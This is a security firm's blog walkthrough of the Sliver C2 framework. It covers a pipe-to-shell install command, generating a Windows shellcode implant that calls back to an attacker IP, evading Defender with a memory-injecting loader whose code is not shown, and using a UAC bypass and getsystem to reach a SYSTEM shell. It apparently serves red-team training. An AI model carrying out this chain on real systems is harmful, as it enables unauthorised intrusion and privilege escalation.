Less travelled road is for the curious and courageous ones. That’s the driver to the incubation of this idea — Getting System Shell using Sliver C2. As defences against attack have improved over time, hackers increasingly adopting Sliver C2 framework as alternative attack tool. Apparently, there are not many resources available out there about Sliver yet. We believe this will be a great help to those who are starting out and looking for more guided steps. So, let’s have some fun with Sliver!
Installation of Sliver Server and Client
In this example, we run the C2 server and client on Linux environments.
One-liner Linux install script:
curl https://sliver.sh/install|sudo bashThen, run sliver to start the server console.
Sliver-Client (Operator):
Download the latest client binary from https://github.com/BishopFox/sliver/releases
Setting Up Multi-player Sliver
In larger-scale red teaming collaboration engagements, we can have multiple operators (players) simultaneously connect to the same Sliver server, commanding a sliver army.
The easiest way to set up a server for multiplayer is to use the one-liner install script stated above, which will configure the server as a systemd service.
Operators and servers connection authenticate using Mutual TLS and all the certificates are managed automatically by Sliver.
Generate a new operator configuration file using the sliver-server binary that by default placed in /root
./sliver-server operator — name numenplayer1 — lhost 192.168.81.135 — save numenplayer1.cfg
Next, copy the operator’s configuration (.cfg) file to the operator’s machine.
At the sliver-client machine, we run the command to import the configuration file and then run the sliver-client binary to connect to the server.
Over at the Sliver server console, we will see the new operator has joined in.
Sliver implants support two modes of operation: “beacon mode” and “session mode.” In this example, we generate a session implant shellcode. The shellcode binary will be saved into the specified directory.
Generating Implants
Sliver implants support two modes of operation: “beacon mode” and “session mode.” In this example, we generate a session implant shellcode. The shellcode binary will be saved into the specified directory.
generate — mtls <attacker_ip> — save /tmp — skip-symbols -f shellcode — os windows
Figure 4: Generating Implant in the form of Shellcode In order to execute the shellcode without it being killed by Windows Defender, we have created a payload written in Golang language that performs the following:
- Download the Sliver implant shellcode
- Inject and execute in memory
*We will share the code in the next article 🙂
Getting Shell and Interacting with Sessions
Before you can catch a shell, start an mTLS listener to support the callbacks.
Serve up a Python file server for the shellcode download. The custom Go-based payload was executed on the compromised system. Now, it’s time for the thrill – we got a shell!
To interact with the callback session, we can run the command:
sessions -i <session_id>
use <session_id>
Before we carry out post-exploitation steps, we can run any recon scripts of your choice using Sliver built-in command execute-assembly.
Run getprivs command to confirm the integrity level of the account.
Post-Exploitation: Getting Elevated and System Session
Our final objective is to open a SYSTEM shell. In order to achieve that, we first need to obtain an elevated Sliver session. This is where bypassing User Account Control (UAC) comes into play.
We will upload a UAC bypass binary into the compromised system, which is an intel recipe developed by Numen researcher.
Next, execute the Sliver implant to spawn a new Sliver elevated session.
Let’s check if the new session was running in elevated process, so we run the getprivsagain.
Now, run getsystemcommand to spawn a new session running as NT AUTHORITYSYSTEM. Voila!
Wrapping Up
In recent months, Sliver emerges as Cobalt Strike alternative for malicious C2, integrating the Sliver commands giving threat actors increased level of chance to evade automated security detections.
In the coming weeks, we will be releasing an article on real-world red teaming engagement scenarios using Sliver C2, including the codes to bypass Defender.
Numen Cyber Labs is committed to facilitating the safe development of Web 3.0. We are dedicated to the security of the blockchain ecosystem, as well as operating systems & browser/mobile security. We regularly disseminate analyses on topics such as these, please stay tuned or visit our blog here for more!
This blog was originally published on our Medium Account.
